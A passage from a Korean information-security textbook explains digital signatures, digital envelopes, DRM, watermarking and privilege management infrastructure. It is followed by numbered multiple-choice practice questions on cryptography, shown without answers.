생성한다. o 송신자는 생성된 메시지 다이제스트에 자신의 개인키를 이용하여 암호화시킴으로써 전자서명을 실시한다. o 송신자는 송신 메시지와 전자서명을 수신자에게 전송한다. o 수신자는 수신한 전자서명을 송신자의 공개키를 이용하여 복호화함으로써 송신자가 생성한 메시지 다이제스트를 추출한다. o 수신자는 수신한 메시지에 송신자와 동일한 해쉬 함수를 적용하여 새로운 메시지 다이제스트를 생성한다. o 수신자는 송신자에게 받은 메시지 다이제스트와 자신이 생성한 메시지 다이제스트를 비교하여, 동일 한 경우 정당한 송신자의 전자서명으로 판단한다. 다. 전자서명의 조건 전자서명이 안전하고 유효하기 위해서는 다음과 같은 조건을 만족해야 한다. o 서명자 인증(User authentication) : 전자서명의 서명자를 누구든지 검증할 수 있어야 한다. o 부인 불가(Non-repudiation) : 서명자는 후에 서명한 사실을 부인할 수 없어야 한다. o 변경 불가(unalterable) : 합법적인 사용자만이 서명한 문서의 내용을 변경할 수 있어야 한다는 것으로 개인키를 소유하지 않은 자는 전자문서를 변경할 수 없다. o 재사용불가(not reusable) 조건은 문서의 서명을 다른 문서의 서명으로 다시 사용할 수 없어야 한다는 것으로 한번 사용한 전자서명을 다시 사용할 수 없다. o 위조불가(un-forgeable) : 조건은 합법적인 서명자만이 전자서명을 생성할 수 있어야 한다는 것으로 개인키를 소요하지 않은 자는 전자서명을 생성할 수 없다. 253
254 chapter 3. 전자봉투 송신자가 송신 내용을 암호화할 시 수신자만이 볼 수 있도록 수신자의 공개키로 암호화시킨 것을 전자 봉투(Digital Envelope)라 한다. 메시지 자체는 암호화 속도가 빠른 비밀키 암호화 방식으로 암호화하고 암호화에사용된 비밀키를 공개 키 암호화 방식을 이용하여 상대방에게 전달함으로써, 공개키 암호화 방식의 장점인 보안성을 유지하 면서 공개키 암호화 방식의 단점인 처리속도 지연 문제를 해결한다. chapter 4. DRM과 워터마킹 디지털 콘텐츠 저작권 보호 기술은 디지털 콘텐츠의 무분별한 불법 복제를 방지하고 이에 의한 문제점 을 해결하여 정당한 저작권 보호를 받을 수 있는 기술을 말한다. 여기서 디지털 콘텐츠란 디지털 형태 로 구성되거나 저장된 정보 자체를 의미하는 것으로 인터넷 등의 매체를 통해 쉽게 대량으로 배포될 수 있으며 복제가 용이한 특징이 있다. 인터넷 보급의 확산 및 정보 기술 발달로 인해 오늘날 실생활 의 대부분의 콘텐츠가 디지털화가 되어가고 있으며 음악, 동영상, 뉴스 등의 중요 정보를 포함한 유료 화된 디지털 콘텐츠를 유통시키는 사업화 모델이 증가하고 있는 추세로, 저작자의 권리를 지켜줄 수 있는 디지털 저작권 보호 기술에 대한 필요성이 증가하고 있다. 가. 디지털 콘텐츠 저작권 보호 기술의 유형 o 소극적인(Active, Explicit) 콘텐츠 보호: 콘텐츠의 사용을 제한하는 기술로 사용 규칙을 정의하고 그 범위 내에서만 콘텐츠가 사용되도록 하는 기술로써 DRM이 있다. o 적극적인(Passive, Implicit) 콘텐츠 보호 : 콘텐츠의 사용을 제한하지는 않으나, 저작권자의 정보나 사용자의 정보를 안전하게 표시하기 위한 것으로, 대표적인 기술로 워터마킹, DOI, INDECS 등이 있다. 나. DRM (1) DRM 개요 DRM(Digital Rights Management)은 암호화 기술을 이용하여 허가되지 않은 사용자로부터 디지털 콘 텐츠를 안전하게 보호함으로써 콘텐츠 저작권 관련 당사자의 권리 및 이익을 지속적으로 보호 및 관리 하는 시스템으로 정의할 수 있다. 즉, 전자서적(e-book), 음악, 비디오, 게임, 소프트웨어, 증권 정보 그리고 이미지등의 각종 디지털 콘텐 츠를 안전하게 보호하기 위한 것으로, 저작자 및 유통업자의 의도에 따라 디지털 콘텐츠가 안전하고 편리하게 유통될 수 있도록 제공되는 모든 기술과 서비스 절차 등을 포함하는 개념이다. (2)DRM 기술 특징 DRM은 재배포(Super-distribution), 투명한 거래구조 그리고 사용규칙이라는 세 가지 특징을 통해 유통 성(콘텐츠의 공개키와 비밀키를 사용하여 제작), 투명성(저작권자와 유통업자 사이 메커니즘) 그리고 사 용성(다양한 비즈니스 모델 적용하여)을 보장한다. 254
255 o 재배포 : 기존 콘텐츠 유통이 사용자의 공개키로 암호화하고, 사용자의 비밀키로 콘텐츠의 암호를 푼다면, DRM에서는 콘텐츠마다 키를 생성하여 사용한다. 즉 콘텐츠의 공개키로 암호화하고, 콘텐츠의 비밀키를 판매(또는 허가받은 사람에게 배포)하는 것이다. 그러므로 누구나 허가를 받은 사람은 해당 콘텐츠를 사용할 수 있는 것이며 이러한 방식으로 콘텐츠를 재활용할 수 있게 된다. o 투명한 거래구조 : 유료 콘텐츠의 경우 사용자에게 서비스 사용료를 부과하고 안전하게 결제할 수 있는 시스템과 저작권의 라이선스에 따른 분배를 투명하게 수행할 수 있는 시스템 구조가 필요하다. 기본적으로 라이선스를 제공하는 기관과 콘텐츠를 배포 하는 기관(쇼핑몰)을 분리함으로써 해결될 수 있다. o 사용 규칙(Usage Rules) : 콘텐츠를 소비자가 사용하는데 있어서 횟수, 날짜 수 그리고 장비 환경 등의 사용권한을 통제하는 것이다. 다. 워터마킹 (1) 워터마킹 개념 워터마킹(Watermarking)이라는 용어는 중세시대에 비밀문서를 주고받기 위해 물에 적시거나 잉크에 적 셔서 글을 읽을 수 있도록 했던 것에서 유래되었다. 과거에 비밀문서를 주고받기 위해서 고안된 것이 었다면 모든 정보가 디지털화 되어가는 요즘은 디지털 콘텐츠의 불법 복제나 소유권 주장을 위해 워터 마킹의 필요성이 요구된다. 워터마킹은 저작권을 보호하고자 하는 대상 미디어(이미지, 오디오, 동영상)에, 저작권 정보를 담고 있 는 로고 이미지, Copyrights(저작권), 생성 날짜 그리고 아이디 등의 정보를 사람의 육안이나 청각으로 는 구별할 수 없게 삽입하는 기술이다. 만약 유통과정 중에서 디지털 콘텐츠 저작권에 대한 분쟁 발생 시 미디어로부터 워터마킹 삽입 정보 (워터마크)를 추출하여, 추출된 워터마킹 정보에서 원본 이미지의 소유자가 누구인지 등의 저작권 정보 를 확인하여 저작자 증명을 할 수 있게 하는 기술이다. 워터마킹은 워터마킹 삽입 알고리즘과 비밀키를 사용하여, 사용자에게 표시되지 않게 저작권 정보를 삽입하며 원본 미디어와 파일 포맷 상의 변화가 존재하지 않으므로 사용자가 이용 시 어떠한 제한도 통제되지 않는 특징이 있다. (2)워터마킹 기술 조건 워터마킹 삽입 시 다음과 같은 기술 조건이 있으며, 아래 조건들 사이에는 적절한 균형이 필요하다. o 지각적 투명성 : 워터마크가 원본 데이터의 품질에 영향을 미치지 않도록 삽입하여 사용자가 변화를 인지할 수 없어야 한다. o 강인성 : 원본 이미지에 삽입된 워터마킹 정보가 어떠한 경우에도 훼손되지 않고 추출 가능한 특성 을 가져야 한다. 이러한 특성을 이용하면 워터마킹이 삽입된 이미지를 비록 프린터로 출력 하더라도 인쇄물로부터 워터마킹 정보를 추출할 수 있음으로써 해당 콘텐츠의 저작권자가 누구인지를 알아낼 수 있게 된다. o 연약성 : 원본 데이터에 대한 인증이 검증되어야 하는 워터마크의 경우 약간의 조작과 위조에도 워터마크의 손상이 일어나야 하는 특징을 가져야 한다. 예를 들어, 원본 증명이 필요한 문서 를 출력 및 복사하여 배포하고자 하는 경우 워터마킹 정보에 손실이 발생하게 하여 워터마킹 정보의 존재 여부를 판별함으로써 원본 문서의 진위를 가릴 수 있게 되는 것이다. 그러나 이러한 특징을 가진 워터마킹의 경우 얼룩이나 낙서 또는 구김과 같은 물리적 변형을 통해 쉽 게 워터마킹 정보가 훼손된 것처럼 동작할 수 있다. 255
256 o 보안성 : 워터마킹의 보안성은 암호화에서의 보안성과 같은 개념이다. o 추출 시 원본 사용 여부 : 초기에는 원본 데이터가 있어야 추출이 가능했으나, 요즘은 원본 데이터 없이 추출 가능한 방식이 나타나고 있다. 라. DRM과 워터마킹 비교 DRM은 디지털 컨텐츠를 암호화하고 이를 이용하기 위한 여러 가지 조건과 권한을 세분화해서 통제할 수 있는 기능을 제공하는 반면, 워터마킹은 보호 대상인 이미지, 오디오 그리고 동영상에 저작권 정보 를 눈에 보이지 않게 삽입하고 추후에 이를 활용할 수 있도록 하는 기술적 특성을 제공한다. 가. PMI 개요 chapter 5. PMI PMI(Privilege Management Infrastructure)는 속성 인증서(AC, Attribute Certificate)의 발급, 저장, 유통 을 관리하는 권한관리 기반 구조를 말하며 공개키 기반 구조(PKI)와 비슷한 구조를 가진다. 기존의 PKI 인증서는 현실상에서 주민등록증과 같이 신원 확인을 위한 인증서였으나, PMI 인증서(속성 인증서)는 기존의 인증서 구조에 소유자의 역할, 권한 등의 다양한 속성 정보를 포함하여 주체(소유자)와 객체(자 원)간의 관계를 제 3의 인증기관이 인증하는 권한 관리 메커니즘으로 사용된다. 나. PMI 출연 배경 초기 사용자에게 속성 정보를 제공하기 위해 가장 쉽게 생각되었던 방법은 기존 신원 확인용 PKI 인증 서의 확장 필드에 속성 정보를 추가함으로써 기존의 공개키 기반 구조 시스템을 그대로 사용하는 것이 었으나 다음과 같은 문제가 발생함으로써 별도의 속성 인증서를 발급하는 PMI 시스템이 나타나게 되 었다. o 유효기간의 차이 : 신원 인증 정보의 경우 대개 1년 이상의 유효기간을 가지나, 속성 정보는 변경이 빈번하여 유효기간이 대체적으로 짧아 기존의 PKI 인증서의 확장 필드를 이용할 경우 인증서의 재발 급, 갱신 그리고 폐지가 빈번하게 된다. o 인증서 발급 기관(인증기관)의 불일치 : PKI 인증서는 사용자, 조직의 신원에 대한 인증서로 제 3의 공인인증기관이 발급, 갱신 그리고 폐지 등의 관리를 담당하고 있으며 목적에 따라서 별도의 조직(기 업)이 발급 및 관리하고 있다. 그러나 PMI 인증서에 포함되는 속성 정보(역할, 권한, 지위 등)는 해당 조직(기업)에서만 발급 등의 관 리가 가능한 것으로 PKI 인증서를 발급하는 인증기관과 다르다. 256
257 다. PMI 구성 다음 (그림 2-4)는 PMI 구성 요소이다. o SOA(Source Of Authority) : 공개키 기반 구조의 root CA 역할로써 무조건 신뢰하는 인증기관이다. o AA(Attribute Authority) : SOA로부터 권한을 위임받은 인증기관으로, 실제 속성 인증서 발급 업무를 수행한다. o 권한 소유자 : 인증기관으로부터 자원에 대한 권한을 인가받은 사용자, 즉 속성 인증서를 발급받은 사용자로, PKI에서의 일반 사용자와 같다. o 권한 검증자 : 권한 소유자가 제출한 속성 인증서를 검증하는 사용자(조직)로써, 권한 소유자가 자원 에 대한 접근을 정당하게 요청하고 있는지 확인한다. 257
258 제 4장. 암호학 연습 문제 258
259 1. DES는 64비트의 평문을 64비트의 암호문으로 만드는 블록 암호시스템으로 56비트 키를 사용한다. 다음 중 DES를 이용한 가장 안전한 암호화 방법은 무엇인가? ➀ 같은 키를 이용하여 한 번 암호화한다. ➁ 같은 키를 이용하여 두 번 암호화한다. ➂ 두 개의 키를 이용하여 두 번 암호화한다. ➃ 다른 키를 이용하여 세 번 암호화한다. 2. 데이터를 암호화하는데 사용되는 RSA 기법에 대한 다음 설명 중 옳지 않은 것은? 4. DES 알고리즘에 대한 설명으로 옳지 않은 것은? ➀ 비밀키를 사용하여 데이터를 암호화하는 방법으로 널리 사용되고 있다. ➁ 다른 비밀키 암호화 방법과 마찬가지로, 송신자와 수신자는 동일한 개인키를 알고 사용해야만 한다. ➂ DES는 각 64비트 데이터 블록에 56비트 길이의 키를 적용한다. ➃ 일반적인 표준 암호화 인증 방식으로 사용되고 있다. ➀ 암호화키와 복호화키는 별도로 사용한다. ➁ 암호화키를 일반적으로 공개키라고도 한다. ➂ 복호화키는 반드시 비밀로 보호되어야 한다. ➃ 암호화키를 사용하여 복호화키를 유도하는 것은 가능하다. 3. 다음의 암호화 및 복호화 과정 중 어떤 것이 송신자 또는 수신자에게 기밀성, 메시지 무결성 그리고 부인 방지를 확보하는데 가장 크게 보증하는가? ➀ 수신자가 개인키를 이용하여 비밀키를 복호화한다. ➁ 비밀키를 사용하여 암호화된 pre-hash 코드와 메시지를 암호화한다. ➂ 암호화된 pre-hash 코드를 전달된 메시지로부터 수학적으로 추출한다. ➃ 수신자는 공인된 권한에 의해 검증된 송신자의 공개키를 이용하여 pre-hash 코드를 복호화한다. 5. 다음 중 암호화(Encryption)에 대한 설명으로 적합하지 않은 것은 어느 것인가? ➀ 소프트웨어 암호화는 시스템의 암호화 기능을 저하시킨다. ➁ 하드웨어 암호화가 더 빠르다. ➂ 패킷 암호화로 인하여 근거리 통신망(LAN) 상에서 이용하기에 적합하다. ➃ 키에 관한 철저한 관리가 필요하다. 6. Diffie-Hellman 알고리즘은 비밀키(Secret-Key)를 공유(키 교환)하는 과정에서 특정 공격에 취약할 가능성이 존재한다. 다음 중 Diffie-Hellman 알고리즘에 가장 취약한 공격이라 할 수 있는 것은? ➀ 중재자 공격(Man-in-the-Middle-Attack)에 취약하다. ➁ 재전송 공격(Reply Attack)에 취약하다. ➂ 강제지연 공격(Forced-delay Attack)에 취약하다. ➃ 반사공격(Reflection Attack)에 취약하다. 259
260 7. 공개키 암호화는 전자상거래, 인트라넷, 외부망 및 다른 웹 기반 응용프로그램에 있어 중요한 기술이다. 다음 중 공개키 암호화에 올바른 설명이 아닌 것은? 11. 암호화란 메시지를 해커가 파악하지 못하도록 원래의 메시지와 다른 형태로 코드화하는 방법이다. 암호화의 기능 중 올바르지 않은 것은? ➀ 암호화를 위해 공개키와 개인키를 사용한다. ➁ 윈도우의 파일 암호화에도 사용된다. ➂ 공개키 암호화는 대칭 구조를 가진다. ➃ 공개키를 사용하여 암호화하면 개인키를 이용하여 복호화한다. ➀ 익명성(Anonymity)을 제공한다. ➁ 신분 인증(Authentication)을 제공한다. ➂ 메시지의 보안성을 전달매체의 보안성과 분리한다. ➃ 상호신뢰성(Trust)을 제한한다. 8. 암호화의 강도가 가장 강력한 암호화는? 12. 암호화 시스템 중 그 방식이 다른 것은? ➀ Transposition Cipher ➁ Substitution Cipher ➂ Product Cipher ➃ Permutation Cipher ➀ 비밀키 암호화 방식(Secret key) ➁ 공개키 암호화 방식(Public key) ➂ 대칭키 암호화 방식(Symmetric key) ➃ 관용키 암호화 방식(Conventional) 9. 암호화에서 보는 메시지 다이제스트(Message Digest) 알고리즘에 대한 설명으로 틀린 것은? ➀ 메시지 다이제스트 알고리즘은 일반적인 압축프로그램 (PKxip, winzip, gzip)과 같이 압축하고 복구할 수 있다. ➁ 메시지 다이제스트 문장은 원본 데이터를 대신하여 사용하기도 한다. ➂ 메시지 다이제스트는 공개키 암호 시스템을 더 효과적으로 이용하기 위하여 만들어졌다. ➃ 메시지 다이제스트 알고리즘은 체크썸(Checksum) 기능도 포함한다. 13. 다음 중 인터넷 인증과 암호화에 사용되는 방법 중에 나머지 세 가지와 성격이 다른 하나는? ➀ SET(Secure Electronic Transaction) ➁ S/HTTP(Secure HTTP) ➂ SSL(Secure Socket Layer) ➃ DES(Data Encryption Standard) 14. 비밀키(Secret-Key)와 공개키(Public-Key) 암호화 알고리즘에 대한 설명 중 옳지 못 한 것을 모두 고르시오? 10. 컴퓨터와 네트워크에 대한 의존도가 커질수록 그 부작용 또한 증가하고 있다. 이러한 부작용으로부터 정보의 안전한 유통과 보안을 위해 암호화 방법이 사용된다. 다음 암호화의 정의를 설명 중 올바르지 않은 것은? ➀ 메시지를 원본과 다른 형태로 코드화하는 방법이다. ➁ 안전이 보장되지 않은 환경에 있는 데이터를 안전하게 유지한다. ➂ 네트워크를 통해 전송되는 정보를 보호하는 가장 강력한 수단이다. ➃ 메시지의 보안성을 전달매체의 보안성과 동일하게 코드화한다. ➀ 비밀키 암호화 알고리즘은 공개키 알고리즘보다 월등히 빠르다. ➁ 키 길이는 비밀키가 공개키 암호화 알고리즘보다 짧다. ➂ 키를 분배하는 것은 비밀키가 공개키 암호화 알고리즘보다 수월하다 ➃ 비밀키 암호화 알고리즘은 기밀성, 무결성 그리고 부인방지에 대한 암호학적 확신을 줄 수 있다. 260
261 15. 다음 알고리즘 중에서 성격이 다른 하나는? ➀ MD4 ➁ MD5 ➂ SHA1 ➃ DES 16. 다음에서 해쉬 알고리즘의 특징이 아닌 것은? ➀ 강한 충돌 회피성이 필요하다. ➁ 임의의 길이의 입력 메시지를 고정된 길이의 출력값으로 압축시키는 함수이다. ➂ 데이터의 무결성 검증과 메시지 인증에 사용된다. ➃ 주어진 해쉬값 y에 대해서 hash(x)=y 식을 만족하는 x를 찾는 것이 계산적으로 가능하다. 17. 인터넷을 통하여 전송되는 데이터는 가로채기(Interception)과 스니핑(Sniffing) 등 의 공격 위협에 노출되어 있다. 이러한 노출 위협에 대한 보안 대책으로 가장 적절 한 것은? ➀ 전송데이터의 암호화 ➁ 침입차단시스템을 이용한 접근 통제 ➂ 사설전용망으로의 전환 ➃ 인증서 기반의 인증시스템 구축 18. 다음 중 암호화 시스템의 핵심 요소가 아닌 것은 무엇인가? ➀ 암호화 알고리즘 ➁ 해쉬 함수 ➂ 암호화 키 ➃ 암호화 키의 길이 19. 현대 암호 이론에서 암호는 아래와 같이 정의할 수 있다. 암호란 신뢰하지 않는 사람들 간의 A, B, C 을(를) 보장하기 위하여 평문을 암호문 으로 변화하는 것이다. 다음 중 A, B, C에 들어갈 내용과 가장 관계가 먼 것은 무엇인가? ➀ 기밀성 ➁ 무결성 ➂ 가용성 ➃ 인증 20. 다음의 암호화 방식은 무엇인가? 메시지 한 비트 또는 한 바이트를 한 비트나 한 바이트 단위로 암호화 하는 방식의 암호기법으로 가장 유명한 알고리즘은 Vernam cipher(one time Pad)이다. 이것은 메 시지 비트에 임의의(random) 키 비트를 단순히 더하는(XOR) 방식의 연산을 수행하기 때문에 메시지 크기만큼의 키 비트가 필요하여 실용적으로 상용되지 못하는 특징이 있다. ➀ Stream Ciphers ➁ Block Ciphers ➂ RSA Algorithm ➃ Code Block Ciphers 21. 암호학과 관련된 다음의 용어 중 설명이 틀린 것은? ➀ Cryptography : 일반적으로 암호학을 총칭하는 의미이다. ➁ Decryption: Decipherment로도 쓰이며 암호화된 메시지를 원래의 메시지로 복호화하는 의미이다. ➂ Message: 평문을 암호화여 암호문을 만든 상태를 의미한다. ➃ Plaintext: 암호화되기 이전의 상태로서 일반적으로 판독이 가능한 상태를 의미한다. 261
262 22. 암호화에 사용되는 일반적 원리 중 메시지를 암호화하기 위하여 메시지의 각 글자를 다른 글자로 치환하여 암호문을 작성하는 방식의 암호화 방법은 무엇인가? ➀ 전치 암호(Transposition cipher) ➁ 혼합 암호(Product cipher) ➂ 대치 암호(Substitution cipher) ➃ 대수화 암호(Algebraic cipher) 23. 다음에서 설명하는 비밀키 암호 알고리즘은 무엇인가? Word 단위에 기초한 블록 암호화 알고리즘으로, 블록 size는 Word 사이즈의 두 배이며, 일반적으로 16, 23, 64, 등과 같이 사용된다. 그리고 라운드는 최소 5이상이 되어야 보안적인 의미를 지니게 되며, 최소 12이상, 가능하다면 16 정도가 권장된다. ➀ RC2 ➁ RC5 ➂ DES ➃ IDEA 24. 블록 암호화 알고리즘 중 각각의 평문 블록은 이전의 암호문 블록과 XOR 된 후에 암 호화되는 특성이 있는 운영 모드는 무엇인가? ➀ ECB(Electronic Code Block) ➁ OFB(Cipher Feedback) ➂ CFB(Output Feedback) ➃ CBC(Cipher Block Chaining) 25. 다음 중 RSA 암호화에 대한 설명으로 옳지 않은 것은 무엇인가? ➀ 공개키 암호화 방식에 근간을 둔 암호 알고리즘이다. ➁ 별도 비밀키의 전송 없이 전자서명이 가능하다. ➂ RSA 암호 알고리즘을 이용한 전자메일 암호화의 대표적인 사례는 PGP이다. ➃ RSA 암호화의 단점은 소프트웨어적으로만 구현될 수 있다는 점이다. 26. 인터넷의 공중망을 이용할 때 전송중인 데이터의 기밀성을 보장하기 위한 공개키 암 호화 방법 중 옳은 것은 무엇인가? ➀ 암호화를 위한 키는 공개키를 사용하고 복호화를 위한 키는 개인키를 사용한다. ➁ 암호화를 위한 키는 개인키로 하고 복호화를 위한 키는 대칭키를 사용한다. ➂ 암호화와 복호화를 위해 사용되는 키를 모두 공개한다. ➃ 암호화와 복호화를 위해 사용되는 키를 모두 공개하지 않는다. 27. 일방향 해쉬 함수에 대한 설명 중 옳지 않은 것은 무엇인가? ➀ 전자서명과 메시지의 기밀성을 보장하기 위해 사용한다. ➁ 일방향 해쉬 함수는 입력은 가변적이지만 출력은 항상 고정된 길이를 갖는다. ➂ 일방향 해쉬 함수의 결과값으로 생성되는 메시지 다이제스트는 메시지 다이제스트로부터 원래의 메시지를 다시 구할 수는 없으며 원래의 메시지의 변조 유무만을 확인할 수 있다. ➃ 암호 알고리즘과 달리 구분된 별도의 키를 사용하지 않는다. 28. 다음 중 비대칭키 암호 시스템의 설명으로 틀린 것은? ➀ 비대칭키 암호시스템에서 인증은 송신자는 자신의 개인키를 사용하고 수신자는 송신자의 공개키를 사용한다. ➁ 비대칭키 암호시스템에서의 암호화는 송신자는 수신자의 공개키를 사용하고 수신자는 자신의 개인키를 사용한다. ➂ 비대칭키 암호 시스템은 계산이 복잡하여 속도가 떨어지고 비용이 많이 든다. ➃ 비대칭키 암호 시스템의 암호화키는 비밀로 하여 공개하지 않는다. 262
263 29. 대칭키 또는 공개키 암호화에서 사용되는 키 관리에 대한 기술 중 사용자 A가 secret value를 사용자 B에게 비밀리에 전해주는 키 설정 기술은 무엇인가? ➀ Key Transport Protocol ➁ Key Agreement Protocol ➂ Key Establishment ➃ Key Pre-distribution 30. 서명자가 자신이 서명하는 메시지를 알 수 없는 형식으로 봉투 내의 내용을 보지 않고 겉면에 서명을 하면 내부의 잉크에 의해 서류에 서명이 되는 원리를 이용하는 방식은? ➀ 전자 서명 ➁ 이중 서명 ➂ 은닉 서명 ➃ 전자 봉투 31. 전자화폐의 일반적인 요구 조건이 아닌 것은? ➀ 재사용 금지(안전성, Security) : 복사, 위조와 중복사용 등의 부정사용을 할 수 없는 것 ➁ 분할이용 가능성(Divisibility) : 합계금액이 액면 금액이 될 때까지 사용할 수 있는 것 ➂ 양도 가능성(Transferability) : 타인에게 양도 가능할 것 ➃ 실명 확인 가능성(Traceability) : 거래 증명 등을 위하여 사용자에 대한 신원 확인이 가능할 것 33. 이중 서명에 대한 설명으로 맞는 것은? ➀ 전송 중 보내는 사람의 신분이 확실한지에 대해 두 번 확인하는 절차 ➁ 권한 부여의 의미로서 사용 微?응용 시스템에 대한 사용 권한을 이중으로 부여 받는 것 ➂ 비인가 접근으로부터 자원들을 이중으로 보호하는 서비스 ➃ 전자지불시스템에서 판매자(상점)에게 구매자의 결제정보를 보호 하고, 지불게이트웨이(PG)에게 구매자의 구매정보를 보호하기 위한 서비스 34. 인터넷 환경에서 사용되는 전자화폐란 "화폐로서의 가치를 지니며 가상공간에서 사 용이 적합한 특성을 지닌 전자화된 정보"로 정의된다. 전자화폐로서의 요구사항을 만족 시키기 위해서는 "독립성, 프라이버시 보장, 안전성, 오프라인 그리고 양도성"의 화폐로서의 기본 요구조건이 만족되어야 한다. 다음 중 전자화폐가 되기 위한 요구조건에서 프라이버시 보장을 위해 사용되는 특수 전자서명 기법은 무엇인가? ➀ 대리 전자서명(Proxy Signature) ➁ 부인방지 전자서명(Undeniable Signature) ➂ 수신자지정 전자서명(Nominative Signature) ➃ 은닉 서명(Blind Signature) 32. 암호 알고리즘의 응용 프로토콜을 설명한 것 중 옳지 못한 것은? ➀ 비밀 공유(Secret Sharing) : 비밀을 여러 사람이 공유하여 원래 비밀이 변형되지 않았음을 확인. ➁ 은닉 서명(Blind Signature) : 내용은 보여주지 않고 서명을 받기 위한 방법(전자화폐 발급 시 유용). ➂ 영지식 증명(Zero-knowledge proof) : 사실에 대한 정보는 안 주면서 자신이 그 사실을 알고 있음을 증명. ➃ 동전 던지기(Coin flipping) : 일방향 해쉬 함수를 이용하여 상대방의 부정을 확인. 263
264 35. 전자투표는 암호학의 주요 응용 프로토콜 분야로 안전성과 실용성을 보장하기 위해 계속해서 연구가 진행되고 있는 암호 응용 프로토콜이다. 다음 중 안전성과 실용성을 보장하기 위한 전자투표 프로토콜의 요구사항에 대한 설명 중 틀린 것은 무엇인가? ➀ 검증성(Verifiability): 모든 유효투표가 정확하게 집계되어야 하며, 최종 집계에서 정당한 투표가 제거되지 않아야 한다. ➁ 건전성(Soundness): 부정한 투표자에 의해 정당한 투표인의 투표가 방해되지 않아야 한다. ➂ 기밀성(Privacy): 투표의 결과로부터 투표자의 신분을 확인할 수 없어야 한다(투표자의 익명성 보장). ➃ 단일성 또는 이중투표 불가성(Un-reusability): 정당한 투표자가 두 번 이상 투표에 참여할 수 없어야 한다. 즉 한번만 투표할 수 있어야 한다. 38. X.509와 PGP(Pretty Good Privacy)의 인증에 대하여 잘못 설명하고 있는 것은? ➀ X.509 사용자 인증은 신뢰성 있는 CA에 의해서 생성되어진다. ➁ PGP 사용자들은 자신의 전자인증을 생성하고 서명하게 된다. ➂ X.509는 전자인증의 발행인과 수령인을 구별하지 않는다. ➃ X.509는 한 서명인을 가지고 있고 PGP는 여러 명의 서명인을 가질 수 있다. 39. 전자서명에 대한 설명으로 옳지 않은 것은? ➀ 수신자가 문서를 재사용할 수 있다. ➁ 송신자가 문서에 대하여 부인을 할 수 없다. ➂ 서명된 문서가 변형되지 않았다는 무결성을 보장한다. ➃ 필요할 경우 문서에 대하여 다른 사람이 알아볼 수 없도록 기밀성을 보장한다. 36. 다음 보기에서 설명하는 것은 무엇인가? 어떠한 사실을 알고 있는 경우, 그 사실에 대한 정보는 전혀 주지 않으면서 자신이 그 사실을 알고 있다는 것을 증명하는 방법 ➀ 믹스서버 방식의 증명 ➁ 준동형 암호를 이용한 증명 ➂ 대화형 증명 ➃ 영지식 증명 37. 공개키 암호화 알고리즘에서 인증되지 않은 공개키를 사용한다면 이는 다양한 공격 에 노출될 수 있다. 따라서 공개키에 대한 인증서를 발급하는 공개키 기반 구조(PKI) 시스템이 필요하다. 이 때 사용되는 공개키 인증서의 형식은 무엇인가? ➀ X.400 ➁ X.409 ➂ X.500 ➃ X 직원의 갑작스러운 퇴사, 고의적인 키의 파손 또는 비악의적인 키 분실 등으로 기업 내 비밀문서의 복호화가 불가능하거나 범죄관련 문서의 복호화가 불가능할 수 있다. 이러한 암호기술의 역기능을 극복하기 위하여 일반적으로 암호문의 소유자(일반적인 암호 시스템에서 키를 소유한 사람)가 아닐지라도 사전에 약속된 어떤 특정한 조건 하에서 허가된 사람에게 복호 능력을 제공하기 위해 제안된 것은? ➀ 인증센터 (CA: Certification Authority) ➁ 암호키 관리 기반구조 (KMI: Key Management Infrastructure) ➂ 공개키 기반구조 (PKI : Public Key Infrastructure) ➃ 키 분배 센터 (KDC : Key Distribution Center) 264
265 41. 키 복구 기술의 분류가 아닌 것은? ➀ 키 위탁(Key escrow) ➁ 캡슐화(Encapsulation) ➂ 공개키 기반구조(PKI : Public Key Infrastructure) ➃ 제3기관 방식(TTP : Trusted Third Party) 42. 전자상거래의 문제점과 해결 방법을 올바르게 연결하지 못한 것은? ➀ 전자문서의 위 변조 - 전자서명 기술 활용 ➁ 거래 상대방의 신원 확인 - 전자서명 인증제도 활용 ➂ 문서작성 사실 입증 곤란 - 생체인식 기술 활용 ➃ 전송내용의 비밀 유지 - 기밀성 유지를 위한 암호 사용 43. 전자 인증체계를 위한 구성 요소가 아닌 것은? ➀ 키 분배 센터 ➁ 인증기관 ➂ 등록기관 ➃ 최종 객체 및 디렉터리 45. 디지털 컨텐츠의 저작권을 보호하는 데에 사용되는 기술적, 법적 그리고 사회적 메커 니즘인 DRM(Digital Rights Management)의 핵심기술과 가장 먼 것은? ➀ 디지털 워터마킹 기술 ➁ 암호 기술 ➂ 인증 기술 ➃ 키 분배 기술 46. 인증 종류 중 메시지 인증을 하는 기본적인 이유에 해당하지 않는 것은? ➀ 메시지의 내용의 기밀성을 보장하기 위해 ➁ 송신자의 송신 여부를 입증하기 위해 ➂ 메시지의 변형 여부를 입증하기 위해 ➃ 메시지의 순서를 입증하기 위해 47. 다음 중 전자서명에 대한 설명으로 옳지 않은 것은? ➀ 서로 인가된 코드를 바탕으로 인증한다. ➁ 인증을 강화한다. ➂ 수신자가 부인하는 것이 가능하다. ➃ 재전송을 방지(Replay Protection)한다. 44. 사용자의 권한, 임무 그리고 지위 등과 같은 사용자에 대한 다양한 속성정보를 제공 하여 권한을 집중적으로 관리하는 속성 기관을 두고, 이 속성 기관에서 속성 인증서 를 발행하여, 특정 객체에 대한 액세스 권한을 제어하기 위한 것은? ➀ 권한관리 기반 구조(PMI) ➁ 공개키 기반 구조(PKI) ➂ 암호키 관리 기반 구조(KMI) ➃ 키 분배 센터(KDC) 48. 송신자가 메시지를 보내지 않았다고 하거나, 수신자가 메시지를 받지 않았다고 하는 행동을 할 수 없게 하기 위한 방법은 무엇인가? ➀ 은닉서명 ➁ 이중서명 ➂ 부인방지 ➃ 메시지 인증 265
266 49. 다음 중 전자인증서(Digital Certificate)의 설명으로 틀린 것은? 53. 공개키 기반구조(PKI)와 암호키 관리 기반구조(KMI)의 가장 큰 차이점은? ➀ 메시지의 내용에 수정, 삽입 그리고 삭제 등이 없었다는 것을 인증 ➁ 다른 사람의 공개키가 맞는지를 확인하기 위해 만들어짐. ➂ 제 3의 신뢰성 있는 인증기관에서 발급함. ➃ 인증기관의 개인키로 암호화한 인증대상자의 공개키를 말함. 50. 다음 중 PKI 요소인 CA와 유사한 PMI의 요소는? ➀ AA(Attribute Authority) ➁ SOA(Source Of Authority) ➂ Privilege Holder ➃ Privilege Verifier 51. 인증기관(CA)의 중요한 책임이 아닌 것은? ➀ 사용자의 인증 ➁ 인증서의 발행 ➂ 인증서의 취소 ➃ 사용자의 비밀키 관리 52. 인증기관(CA)과 키 분배 센터(KDC)의 가장 큰 차이점은? ➀ 사용자 인증 취소 ➁ 사용자 인증 ➂ 키의 처리 